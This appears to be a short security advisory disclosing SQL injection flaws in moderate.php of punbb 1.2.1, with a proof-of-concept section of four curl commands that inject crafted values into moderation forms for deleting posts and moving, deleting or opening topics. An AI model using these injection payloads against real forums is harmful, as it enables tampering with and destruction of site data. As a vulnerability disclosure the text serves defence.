advisory003.txt

`==============================================  
SQL Injections in punbb-1.2.1 moderate.php  
==============================================  
  
Description  
-----------  
  
Improper handling of several arguments in  
moderate.php allows a malicious moderator (or admin)  
to inject arbitrary SQL statements.  
  
This also affects systems using the magic_quotes_gpc  
option in php.ini.  
  
Proof of concept  
----------------  
  
These examples will not do anything malicious or  
even cause the system to report an error. Instead  
they are crafted such that by simply adding a ;  
or ' just before the comment "-- this won't show"  
will cause the SQL query to crash demonstrating  
the injection is possible.  
  
Assumptions:  
- punbb_cookie contains identification of a  
moderator for forum with id 1.  
  
Attacks delete posts:  
curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1  
  
Attacks move topics:  
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1  
  
Attacks delete topics:  
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1  
  
Attacks open/close:  
curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> target/moderate.php?fid=1  
`